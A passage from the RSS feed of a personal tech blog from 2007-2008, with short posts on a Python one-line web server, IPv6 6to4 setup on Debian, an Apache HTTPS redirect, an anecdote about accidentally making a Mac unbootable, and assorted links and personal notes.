  6874.    <content:encoded><![CDATA[<p><a href="http://www.mibbit.com/">Mibbit.com</a> provides an IRC webinterface, so you can hang around in your favorite channels with your iPhone/PDA/fridge/whatever.</p>
  6875. ]]></content:encoded>
  6876.  </item>
  6877.  
  6878.  <item>
  6879.    <title>Ten Thousand Cents</title>
  6880.    <link>https://blog.x-way.org/Misc/2008/04/15/Ten-Thousand-Cents.html</link>
  6881.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324125</guid>
  6882.    <dc:creator>Andreas Jaggi</dc:creator>
  6883.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6884.    <pubDate>Tue, 15 Apr 2008 21:18:00 +0000</pubDate>
  6885.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6886.    <description><![CDATA[<a href="http://www.tenthousandcents.com/">http://www.tenthousandcents.com/</a>
  6887. ]]></description>
  6888.    <content:encoded><![CDATA[<a href="http://www.tenthousandcents.com/">http://www.tenthousandcents.com/</a>
  6889. ]]></content:encoded>
  6890.  </item>
  6891.  
  6892.  <item>
  6893.    <title>Using the X11 clipboard on the commandline</title>
  6894.    <link>https://blog.x-way.org/Linux/2008/03/25/Using-the-X11-clipboard-on-the-commandline.html</link>
  6895.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324124</guid>
  6896.    <dc:creator>Andreas Jaggi</dc:creator>
  6897.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6898.    <pubDate>Tue, 25 Mar 2008 14:27:00 +0000</pubDate>
  6899.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  6900.    <description><![CDATA[<p><a href="http://www.vergenet.net/~conrad/software/xsel/">XSel</a> gives easy commandline access to the X11 clipboard (primary &amp; secondary).</p>
  6901. ]]></description>
  6902.    <content:encoded><![CDATA[<p><a href="http://www.vergenet.net/~conrad/software/xsel/">XSel</a> gives easy commandline access to the X11 clipboard (primary &amp; secondary).</p>
  6903. ]]></content:encoded>
  6904.  </item>
  6905.  
  6906.  <item>
  6907.    <title>Unix Toolbox</title>
  6908.    <link>https://blog.x-way.org/Linux/2008/03/23/Unix-Toolbox.html</link>
  6909.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324123</guid>
  6910.    <dc:creator>Andreas Jaggi</dc:creator>
  6911.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6912.    <pubDate>Sun, 23 Mar 2008 16:36:00 +0000</pubDate>
  6913.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  6914.    <description><![CDATA[<p><a href="https://web.archive.org/web/20080326184716/http://cb.vu/unixtoolbox.xhtml">Unix Toolbox</a>, a nice collection of Unix/Linux/BSD commands, may be useful for advanced users.</p>
  6915. ]]></description>
  6916.    <content:encoded><![CDATA[<p><a href="https://web.archive.org/web/20080326184716/http://cb.vu/unixtoolbox.xhtml">Unix Toolbox</a>, a nice collection of Unix/Linux/BSD commands, may be useful for advanced users.</p>
  6917. ]]></content:encoded>
  6918.  </item>
  6919.  
  6920.  <item>
  6921.    <title>CHALLENGE</title>
  6922.    <link>https://blog.x-way.org/Misc/2008/03/05/CHALLENGE-08.html</link>
  6923.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324122</guid>
  6924.    <dc:creator>Andreas Jaggi</dc:creator>
  6925.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6926.    <pubDate>Wed, 05 Mar 2008 00:00:00 +0000</pubDate>
  6927.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6928.    <description><![CDATA[<p>Don't ask.</p>
  6929. ]]></description>
  6930.    <content:encoded><![CDATA[<p>Don't ask.</p>
  6931. ]]></content:encoded>
  6932.  </item>
  6933.  
  6934.  <item>
  6935.    <title>Too much time for party</title>
  6936.    <link>https://blog.x-way.org/Misc/2008/02/21/Too-much-time-for-party.html</link>
  6937.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324121</guid>
  6938.    <dc:creator>Andreas Jaggi</dc:creator>
  6939.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6940.    <pubDate>Thu, 21 Feb 2008 13:40:00 +0000</pubDate>
  6941.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6942.    <description><![CDATA[<p>
  6943.  
  6944. <img src="https://blog.x-way.org/images/horaire.png" width="467" height="272" alt="Horaire 2008">
  6945.  
  6946. </p>
  6947. ]]></description>
  6948.    <content:encoded><![CDATA[<p>
  6949.  
  6950. <img src="https://blog.x-way.org/images/horaire.png" width="467" height="272" alt="Horaire 2008">
  6951.  
  6952. </p>
  6953. ]]></content:encoded>
  6954.  </item>
  6955.  
  6956.  <item>
  6957.    <title>Some Links II</title>
  6958.    <link>https://blog.x-way.org/Coding/2008/02/15/Some-Links-2-15-8.html</link>
  6959.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324119</guid>
  6960.    <dc:creator>Andreas Jaggi</dc:creator>
  6961.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6962.    <pubDate>Fri, 15 Feb 2008 08:53:00 +0000</pubDate>
  6963.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  6964.    <description><![CDATA[<ul>
  6965.  
  6966. <li><a href="http://www.artima.com/weblogs/viewpost.jsp?thread=4829">Python main() functions</a></li>
  6967.  
  6968. <li><a href="https://web.archive.org/web/20080218202608/http://rghosh.free.fr/essays/quescol.html">Javascript without IFs, WHILEs, or FORs</a></li>
  6969.  
  6970. <li><a href="https://web.archive.org/web/20080219092150/http://cm.bell-labs.com/cm/cs/tpop/grep.c">grep in 98 lines of code</a></li>
  6971.  
  6972. </ul>
  6973. ]]></description>
  6974.    <content:encoded><![CDATA[<ul>
  6975.  
  6976. <li><a href="http://www.artima.com/weblogs/viewpost.jsp?thread=4829">Python main() functions</a></li>
  6977.  
  6978. <li><a href="https://web.archive.org/web/20080218202608/http://rghosh.free.fr/essays/quescol.html">Javascript without IFs, WHILEs, or FORs</a></li>
  6979.  
  6980. <li><a href="https://web.archive.org/web/20080219092150/http://cm.bell-labs.com/cm/cs/tpop/grep.c">grep in 98 lines of code</a></li>
  6981.  
  6982. </ul>
  6983. ]]></content:encoded>
  6984.  </item>
  6985.  
  6986.  <item>
  6987.    <title>Python Webserver in 1 or 15 lines</title>
  6988.    <link>https://blog.x-way.org/Coding/2008/02/14/Python-Webserver-in-1-or-15-lines.html</link>
  6989.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324120</guid>
  6990.    <dc:creator>Andreas Jaggi</dc:creator>
  6991.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6992.    <pubDate>Thu, 14 Feb 2008 21:10:00 +0000</pubDate>
  6993.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  6994.    <description><![CDATA[<p>Python Webserver in 1 line:</p>
  6995.  
  6996. <pre>python -c "import SimpleHTTPServer; SimpleHTTPServer.test()"</pre>
  6997.  
  6998. <p>Python Webserver in 15 lines:</p>
  6999.  
  7000. <pre>import BaseHTTPServer
  7001.  
  7002.  
  7003.  
  7004. class WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  7005.  
  7006.    def do_GET(self):
  7007.  
  7008.        if self.path == '/foo':
  7009.  
  7010.            self.send_response(200)
  7011.  
  7012.            self.do_something()
  7013.  
  7014.        else:
  7015.  
  7016.            self.send_error(404)
  7017.  
  7018.            
  7019.  
  7020.    def do_something(self):
  7021.  
  7022.        print 'hello world'
  7023.  
  7024.        
  7025.  
  7026. server = BaseHTTPServer.HTTPServer(('',80), WebRequestHandler)
  7027.  
  7028. server.serve_forever()</pre>
  7029.  
  7030. <p><a href="https://web.archive.org/web/20080215210902/http://www.goldb.org/goldblog/2008/02/12/Python15LineHTTPServerWebInterfaceForYourTools.aspx">via</a></p>
  7031. ]]></description>
  7032.    <content:encoded><![CDATA[<p>Python Webserver in 1 line:</p>
  7033.  
  7034. <pre>python -c "import SimpleHTTPServer; SimpleHTTPServer.test()"</pre>
  7035.  
  7036. <p>Python Webserver in 15 lines:</p>
  7037.  
  7038. <pre>import BaseHTTPServer
  7039.  
  7040.  
  7041.  
  7042. class WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  7043.  
  7044.    def do_GET(self):
  7045.  
  7046.        if self.path == '/foo':
  7047.  
  7048.            self.send_response(200)
  7049.  
  7050.            self.do_something()
  7051.  
  7052.        else:
  7053.  
  7054.            self.send_error(404)
  7055.  
  7056.            
  7057.  
  7058.    def do_something(self):
  7059.  
  7060.        print 'hello world'
  7061.  
  7062.        
  7063.  
  7064. server = BaseHTTPServer.HTTPServer(('',80), WebRequestHandler)
  7065.  
  7066. server.serve_forever()</pre>
  7067.  
  7068. <p><a href="https://web.archive.org/web/20080215210902/http://www.goldb.org/goldblog/2008/02/12/Python15LineHTTPServerWebInterfaceForYourTools.aspx">via</a></p>
  7069. ]]></content:encoded>
  7070.  </item>
  7071.  
  7072.  <item>
  7073.    <title>Some Links</title>
  7074.    <link>https://blog.x-way.org/Coding/2008/02/11/Some-Links-2-13-8.html</link>
  7075.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324118</guid>
  7076.    <dc:creator>Andreas Jaggi</dc:creator>
  7077.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7078.    <pubDate>Mon, 11 Feb 2008 10:00:00 +0000</pubDate>
  7079.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  7080.    <description><![CDATA[<ul>
  7081.  
  7082. <li><a href="http://regexpal.com/">RegexPal, a JavaScript regular expression tester</a></li>
  7083.  
  7084. <li><a href="https://web.archive.org/web/20080516202129/http://www.dustindiaz.com/namespace-your-javascript/">Namespacing your JavaScript</a></li>
  7085.  
  7086. <li><a href="https://web.archive.org/web/20090327122649/http://blog.256bit.org/archives/455-In-Vim-Marks-visualisieren.html">In Vim Marks visualisieren</a></li>
  7087.  
  7088. </ul>
  7089. ]]></description>
  7090.    <content:encoded><![CDATA[<ul>
  7091.  
  7092. <li><a href="http://regexpal.com/">RegexPal, a JavaScript regular expression tester</a></li>
  7093.  
  7094. <li><a href="https://web.archive.org/web/20080516202129/http://www.dustindiaz.com/namespace-your-javascript/">Namespacing your JavaScript</a></li>
  7095.  
  7096. <li><a href="https://web.archive.org/web/20090327122649/http://blog.256bit.org/archives/455-In-Vim-Marks-visualisieren.html">In Vim Marks visualisieren</a></li>
  7097.  
  7098. </ul>
  7099. ]]></content:encoded>
  7100.  </item>
  7101.  
  7102.  <item>
  7103.    <title>Biking to work was much more fun in California</title>
  7104.    <link>https://blog.x-way.org/Misc/2008/02/04/Biking-to-work-was-much-more-fun-in-California.html</link>
  7105.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324117</guid>
  7106.    <dc:creator>Andreas Jaggi</dc:creator>
  7107.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7108.    <pubDate>Mon, 04 Feb 2008 20:30:00 +0000</pubDate>
  7109.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7110.    <description><![CDATA[<img src="https://blog.x-way.org/images/coldweather.png" width="349" height="416" alt="Cold weather">
  7111. ]]></description>
  7112.    <content:encoded><![CDATA[<img src="https://blog.x-way.org/images/coldweather.png" width="349" height="416" alt="Cold weather">
  7113. ]]></content:encoded>
  7114.  </item>
  7115.  
  7116.  <item>
  7117.    <title>Pancake Man</title>
  7118.    <link>https://blog.x-way.org/Misc/2008/02/04/Pancake-Man.html</link>
  7119.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324116</guid>
  7120.    <dc:creator>Andreas Jaggi</dc:creator>
  7121.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7122.    <pubDate>Mon, 04 Feb 2008 20:14:00 +0000</pubDate>
  7123.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7124.    <description><![CDATA[<p><a href="https://youtu.be/UG5gO4nlLRQ" title="Pancake Man - YouTube">Pancake Man</a></p>
  7125. ]]></description>
  7126.    <content:encoded><![CDATA[<p><a href="https://youtu.be/UG5gO4nlLRQ" title="Pancake Man - YouTube">Pancake Man</a></p>
  7127. ]]></content:encoded>
  7128.  </item>
  7129.  
  7130.  <item>
  7131.    <title>UNIX tips</title>
  7132.    <link>https://blog.x-way.org/Linux/2008/01/24/UNIX-tips.html</link>
  7133.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324115</guid>
  7134.    <dc:creator>Andreas Jaggi</dc:creator>
  7135.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7136.    <pubDate>Thu, 24 Jan 2008 22:29:00 +0000</pubDate>
  7137.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  7138.    <description><![CDATA[<ul>
  7139.  
  7140. <li><a href="http://www.ibm.com/developerworks/aix/library/au-badunixhabits.html">Learn 10 good UNIX usage habits</a></li>
  7141.  
  7142. <li><a href="http://www.ibm.com/developerworks/aix/library/au-productivitytips.html">Productivity tips</a></li>
  7143.  
  7144. <li><a href="http://www.ibm.com/developerworks/aix/library/au-rundown.html">Become a better blogger with UNIX</a></li>
  7145.  
  7146. </ul>
  7147. ]]></description>
  7148.    <content:encoded><![CDATA[<ul>
  7149.  
  7150. <li><a href="http://www.ibm.com/developerworks/aix/library/au-badunixhabits.html">Learn 10 good UNIX usage habits</a></li>
  7151.  
  7152. <li><a href="http://www.ibm.com/developerworks/aix/library/au-productivitytips.html">Productivity tips</a></li>
  7153.  
  7154. <li><a href="http://www.ibm.com/developerworks/aix/library/au-rundown.html">Become a better blogger with UNIX</a></li>
  7155.  
  7156. </ul>
  7157. ]]></content:encoded>
  7158.  </item>
  7159.  
  7160.  <item>
  7161.    <title>How to brick your Mac</title>
  7162.    <link>https://blog.x-way.org/Mac/2008/01/19/How-to-brick-your-Mac.html</link>
  7163.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324112</guid>
  7164.    <dc:creator>Andreas Jaggi</dc:creator>
  7165.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7166.    <pubDate>Sat, 19 Jan 2008 00:32:00 +0000</pubDate>
  7167.    <category domain="https://blog.x-way.org/Mac">Mac</category>
  7168.    <description><![CDATA[<ol>
  7169.  
  7170. <li>Install Mac OS X 10.4</li>
  7171.  
  7172. <li>Install <a href="http://refit.sourceforge.net/">rEFIt</a></li>
  7173.  
  7174. <li>Install Linux</li>
  7175.  
  7176. <li>After some time decide to upgrade to Mac OS X 10.5 and at the same time make the partition bigger (e.g. by merging with a FAT32 partition which was originally intended to contain some Windows)</li>
  7177.  
  7178. <li>Use the <a href="http://www.gnu.org/software/parted/">GNU Parted</a> utility to delete the Mac OS X and FAT 32  partitions and create a new bigger partition for Mac OS X 10.5.</li>
  7179.  
  7180. <li>Restart your Mac.</li>
  7181.  
  7182. <li>Cheer that now you can no longer boot from the harddisk or a CD/DVD nor from anything else!</li>
  7183.  
  7184. </ol>
  7185.  
  7186. <p>And now, how to un-brick it again:</p>
  7187.  
  7188. <ol>
  7189.  
  7190. <li>Call Apple support</li>
  7191.  
  7192. <li>Find out that you are lucky and have some warranty left (6 days in my case!!!).</li>
  7193.  
  7194. <li>Bring your Mac to an Authorized Service Provider.</li>
  7195.  
  7196. <li>Get it back with a new harddisk :-)</li>
  7197.  
  7198. </ol>
  7199. ]]></description>
  7200.    <content:encoded><![CDATA[<ol>
  7201.  
  7202. <li>Install Mac OS X 10.4</li>
  7203.  
  7204. <li>Install <a href="http://refit.sourceforge.net/">rEFIt</a></li>
  7205.  
  7206. <li>Install Linux</li>
  7207.  
  7208. <li>After some time decide to upgrade to Mac OS X 10.5 and at the same time make the partition bigger (e.g. by merging with a FAT32 partition which was originally intended to contain some Windows)</li>
  7209.  
  7210. <li>Use the <a href="http://www.gnu.org/software/parted/">GNU Parted</a> utility to delete the Mac OS X and FAT 32  partitions and create a new bigger partition for Mac OS X 10.5.</li>
  7211.  
  7212. <li>Restart your Mac.</li>
  7213.  
  7214. <li>Cheer that now you can no longer boot from the harddisk or a CD/DVD nor from anything else!</li>
  7215.  
  7216. </ol>
  7217.  
  7218. <p>And now, how to un-brick it again:</p>
  7219.  
  7220. <ol>
  7221.  
  7222. <li>Call Apple support</li>
  7223.  
  7224. <li>Find out that you are lucky and have some warranty left (6 days in my case!!!).</li>
  7225.  
  7226. <li>Bring your Mac to an Authorized Service Provider.</li>
  7227.  
  7228. <li>Get it back with a new harddisk :-)</li>
  7229.  
  7230. </ol>
  7231. ]]></content:encoded>
  7232.  </item>
  7233.  
  7234.  <item>
  7235.    <title>Embed Flash into valid XHTML documents</title>
  7236.    <link>https://blog.x-way.org/Webdesign/2008/01/12/Embed-Flash-into-valid-XHTML-documents.html</link>
  7237.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324109</guid>
  7238.    <dc:creator>Andreas Jaggi</dc:creator>
  7239.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7240.    <pubDate>Sat, 12 Jan 2008 17:12:00 +0000</pubDate>
  7241.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  7242.    <description><![CDATA[<pre>
  7243.  
  7244. &lt;object type="application/x-shockwave-flash" data="flash.swf" width="100" height="200"&gt;
  7245.  
  7246. &lt;param name="movie" value="flash.swf" /&gt;
  7247.  
  7248. &lt;/object&gt;
  7249.  
  7250. </pre>
  7251. ]]></description>
  7252.    <content:encoded><![CDATA[<pre>
  7253.  
  7254. &lt;object type="application/x-shockwave-flash" data="flash.swf" width="100" height="200"&gt;
  7255.  
  7256. &lt;param name="movie" value="flash.swf" /&gt;
  7257.  
  7258. &lt;/object&gt;
  7259.  
  7260. </pre>
  7261. ]]></content:encoded>
  7262.  </item>
  7263.  
  7264.  <item>
  7265.    <title>How to enable IPv6 on your Debian Linux server in 3 easy steps</title>
  7266.    <link>https://blog.x-way.org/Networking/2008/01/09/How-to-enable-IPv6-on-your-Debian-Linux-server-in-3-easy-steps.html</link>
  7267.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324113</guid>
  7268.    <dc:creator>Andreas Jaggi</dc:creator>
  7269.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7270.    <pubDate>Wed, 09 Jan 2008 16:00:00 +0000</pubDate>
  7271.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  7272.    <description><![CDATA[<ol>
  7273.  
  7274. <li>Compute your <a href="http://en.wikipedia.org/wiki/6to4" title="6to4 - Wikipedia">6to4</a> IPv6 address (2002:uuuu:vvvv::1) from your IPv4 address (a.b.c.d): <pre>printf "2002:%02x%02x:%02x%02x::1\n" a b c d</pre></li>
  7275.  
  7276. <li>Add a SIT (IPv6-in-IPv4) interface in /etc/network/interfaces:
  7277.  
  7278. <pre>auto sit0
  7279.  
  7280. iface sit0 inet6 static
  7281.  
  7282.        address 2002:uuuu:vvvv::1
  7283.  
  7284.        netmask 64
  7285.  
  7286.        gateway ::192.88.99.1</pre></li>
  7287.  
  7288. <li><code>ifup sit0</code></li>
  7289.  
  7290. </ol>
  7291.  
  7292. <p>Now you can also add <a href="http://en.wikipedia.org/wiki/AAAA_record#IPv6_and_the_Domain_Name_System" title="AAAA - Wikipedia">AAAA DNS records</a> with 2002:uuuu:vvvv::1 for your domain(s).</p>
  7293. ]]></description>
  7294.    <content:encoded><![CDATA[<ol>
  7295.  
  7296. <li>Compute your <a href="http://en.wikipedia.org/wiki/6to4" title="6to4 - Wikipedia">6to4</a> IPv6 address (2002:uuuu:vvvv::1) from your IPv4 address (a.b.c.d): <pre>printf "2002:%02x%02x:%02x%02x::1\n" a b c d</pre></li>
  7297.  
  7298. <li>Add a SIT (IPv6-in-IPv4) interface in /etc/network/interfaces:
  7299.  
  7300. <pre>auto sit0
  7301.  
  7302. iface sit0 inet6 static
  7303.  
  7304.        address 2002:uuuu:vvvv::1
  7305.  
  7306.        netmask 64
  7307.  
  7308.        gateway ::192.88.99.1</pre></li>
  7309.  
  7310. <li><code>ifup sit0</code></li>
  7311.  
  7312. </ol>
  7313.  
  7314. <p>Now you can also add <a href="http://en.wikipedia.org/wiki/AAAA_record#IPv6_and_the_Domain_Name_System" title="AAAA - Wikipedia">AAAA DNS records</a> with 2002:uuuu:vvvv::1 for your domain(s).</p>
  7315. ]]></content:encoded>
  7316.  </item>
  7317.  
  7318.  <item>
  7319.    <title>Breakout Game written in sed</title>
  7320.    <link>https://blog.x-way.org/Linux/2008/01/06/Breakout-Game-written-in-sed.html</link>
  7321.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324110</guid>
  7322.    <dc:creator>Andreas Jaggi</dc:creator>
  7323.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7324.    <pubDate>Sun, 06 Jan 2008 17:18:00 +0000</pubDate>
  7325.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  7326.    <description><![CDATA[<p>Instead of learning for the exams, I mess around with strange things:</p>
  7327.  
  7328. <p><a href="http://aurelio.net/bin/sed/arkanoid/">arkanoid.sed</a> is a breakout-game written entirely in <a href="http://sed.sourceforge.net/">sed</a>. Download the sed-file and use <code>sed -f arkanoid.sed</code> to start the game. (<a href="http://blog.schatenseite.de/archives/2007/09/19/texteditor-am-limit-arkanoidsed/">via</a>)</p>
  7329.  
  7330. <p><a href="https://blog.x-way.org/images/arkanoid.png"><img src="https://blog.x-way.org/images/arkanoid.png" width="301" height="166" alt="arkanoid.sed"></a></p>
  7331. ]]></description>
  7332.    <content:encoded><![CDATA[<p>Instead of learning for the exams, I mess around with strange things:</p>
  7333.  
  7334. <p><a href="http://aurelio.net/bin/sed/arkanoid/">arkanoid.sed</a> is a breakout-game written entirely in <a href="http://sed.sourceforge.net/">sed</a>. Download the sed-file and use <code>sed -f arkanoid.sed</code> to start the game. (<a href="http://blog.schatenseite.de/archives/2007/09/19/texteditor-am-limit-arkanoidsed/">via</a>)</p>
  7335.  
  7336. <p><a href="https://blog.x-way.org/images/arkanoid.png"><img src="https://blog.x-way.org/images/arkanoid.png" width="301" height="166" alt="arkanoid.sed"></a></p>
  7337. ]]></content:encoded>
  7338.  </item>
  7339.  
  7340.  <item>
  7341.    <title>7 Habits For Effective Text Editing 2.0</title>
  7342.    <link>https://blog.x-way.org/Coding/2008/01/02/7-Habits-For-Effective-Text-Editing-2-0.html</link>
  7343.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324108</guid>
  7344.    <dc:creator>Andreas Jaggi</dc:creator>
  7345.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7346.    <pubDate>Wed, 02 Jan 2008 10:40:00 +0000</pubDate>
  7347.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  7348.    <description><![CDATA[<p><a href="https://youtu.be/eX9m3g5J-XA" title="7 Habits for Effective Text Editing 2.0 - YouTube">7 Habits for Effective Text Editing 2.0</a></p>
  7349.  
  7350. <p>I really, really should have known the <a href="http://www.vim.org/tips/tip.php?tip_id=1">* command</a> earlier.</p>
  7351. ]]></description>
  7352.    <content:encoded><![CDATA[<p><a href="https://youtu.be/eX9m3g5J-XA" title="7 Habits for Effective Text Editing 2.0 - YouTube">7 Habits for Effective Text Editing 2.0</a></p>
  7353.  
  7354. <p>I really, really should have known the <a href="http://www.vim.org/tips/tip.php?tip_id=1">* command</a> earlier.</p>
  7355. ]]></content:encoded>
  7356.  </item>
  7357.  
  7358.  <item>
  7359.    <title>Erlang has no locks and no keys.</title>
  7360.    <link>https://blog.x-way.org/Coding/2007/12/23/Erlang-has-no-locks-and-no-keys.html</link>
  7361.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324107</guid>
  7362.    <dc:creator>Andreas Jaggi</dc:creator>
  7363.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7364.    <pubDate>Sun, 23 Dec 2007 23:12:00 +0000</pubDate>
  7365.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  7366.    <description><![CDATA[<blockquote cite="http://www.pragprog.com/titles/jaerlang">
  7367.  
  7368. <p>Erlang processes don't share memory, so there is no need to lock the memory while it is being used. Where there are locks, there are keys that can get lost. What happens when you lose your keys? You panic and don't know what to do. That's what happens in software systems when you lose your keys and your locks go wrong.</p>
  7369.  
  7370. <p>Distributed software systems with locks and keys always go wrong.</p>
  7371.  
  7372. <p>Erlang has no locks and no keys.</p>
  7373.  
  7374. </blockquote>
  7375.  
  7376. <p><a href="http://www.pragprog.com/titles/jaerlang">Joe Armstrong, Programming Erlang</a></p>
  7377. ]]></description>
  7378.    <content:encoded><![CDATA[<blockquote cite="http://www.pragprog.com/titles/jaerlang">
  7379.  
  7380. <p>Erlang processes don't share memory, so there is no need to lock the memory while it is being used. Where there are locks, there are keys that can get lost. What happens when you lose your keys? You panic and don't know what to do. That's what happens in software systems when you lose your keys and your locks go wrong.</p>
  7381.  
  7382. <p>Distributed software systems with locks and keys always go wrong.</p>
  7383.  
  7384. <p>Erlang has no locks and no keys.</p>
  7385.  
  7386. </blockquote>
  7387.  
  7388. <p><a href="http://www.pragprog.com/titles/jaerlang">Joe Armstrong, Programming Erlang</a></p>
  7389. ]]></content:encoded>
  7390.  </item>
  7391.  
  7392.  <item>
  7393.    <title>Won't you blog about this song?</title>
  7394.    <link>https://blog.x-way.org/Misc/2007/12/05/Wont-you-blog-about-this-song.html</link>
  7395.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324106</guid>
  7396.    <dc:creator>Andreas Jaggi</dc:creator>
  7397.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7398.    <pubDate>Wed, 05 Dec 2007 01:02:00 +0000</pubDate>
  7399.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7400.    <description><![CDATA[<p><a href="https://youtu.be/I6IQ_FOCE6I" title="Here Comes Another Bubble v1.1 - The Richter Scales - YouTube">Here Comes Another Bubble v1.1 - The Richter Scales</a></p><p>(<a href="https://web.archive.org/web/20071207145832/http://blog.koehntopp.de/archives/1915-Bubble-2.0.html">via</a>)</p>
  7401. ]]></description>
  7402.    <content:encoded><![CDATA[<p><a href="https://youtu.be/I6IQ_FOCE6I" title="Here Comes Another Bubble v1.1 - The Richter Scales - YouTube">Here Comes Another Bubble v1.1 - The Richter Scales</a></p><p>(<a href="https://web.archive.org/web/20071207145832/http://blog.koehntopp.de/archives/1915-Bubble-2.0.html">via</a>)</p>
  7403. ]]></content:encoded>
  7404.  </item>
  7405.  
  7406.  <item>
  7407.    <title>Enforce HTTPS for your virtualhosts</title>
  7408.    <link>https://blog.x-way.org/Linux/2007/09/16/Enforce-HTTPS-for-your-virtualhosts.html</link>
  7409.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324104</guid>
  7410.    <dc:creator>Andreas Jaggi</dc:creator>
  7411.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7412.    <pubDate>Sun, 16 Sep 2007 14:13:49 +0000</pubDate>
  7413.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  7414.    <description><![CDATA[<pre>
  7415. NameVirtualHost *:443
  7416. NameVirtualHost *:80
  7417.  
  7418. &lt;VirtualHost *:80&gt;
  7419. ServerName example.org
  7420. RewriteEngine on
  7421. RewriteRule ^(.*)$ https://%{SERVER_NAME}$1 [L,R]
  7422. &lt;/VirtualHost&gt;
  7423.  
  7424. &lt;VirtualHost *:443&gt;
  7425. ServerName example.org
  7426. DocumentRoot /var/www/example.org
  7427. ...
  7428. &lt;/VirtualHost&gt;
  7429. </pre>
  7430.  
  7431. ]]></description>
  7432.    <content:encoded><![CDATA[<pre>
  7433. NameVirtualHost *:443
  7434. NameVirtualHost *:80
  7435.  
  7436. &lt;VirtualHost *:80&gt;
  7437. ServerName example.org
  7438. RewriteEngine on
  7439. RewriteRule ^(.*)$ https://%{SERVER_NAME}$1 [L,R]
  7440. &lt;/VirtualHost&gt;
  7441.  
  7442. &lt;VirtualHost *:443&gt;
  7443. ServerName example.org
  7444. DocumentRoot /var/www/example.org
  7445. ...
  7446. &lt;/VirtualHost&gt;
  7447. </pre>
  7448.  
  7449. ]]></content:encoded>
  7450.  </item>
  7451.  
  7452.  <item>
  7453.    <title>California driving test: passed!</title>
  7454.    <link>https://blog.x-way.org/Misc/2007/07/25/California-driving-test-passed.html</link>
  7455.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324103</guid>
  7456.    <dc:creator>Andreas Jaggi</dc:creator>
  7457.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7458.    <pubDate>Wed, 25 Jul 2007 20:10:05 +0000</pubDate>
  7459.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7460.    <description><![CDATA[<p>I passed the California driving test this afternoon, now the streets are no longer safe :-)<br>The interim driver license looks really shabby, it's just this text printed on cheap copier paper:</p>
  7461. <pre>
  7462.                        INTERIM DRIVER LICENSE
  7463.  
  7464.                  DXXXXXXX        CLASS C
  7465.  
  7466.  
  7467.            ISSUED:07-25-07   XXX   XX/XX   EXPIRES:09-22-07
  7468.  
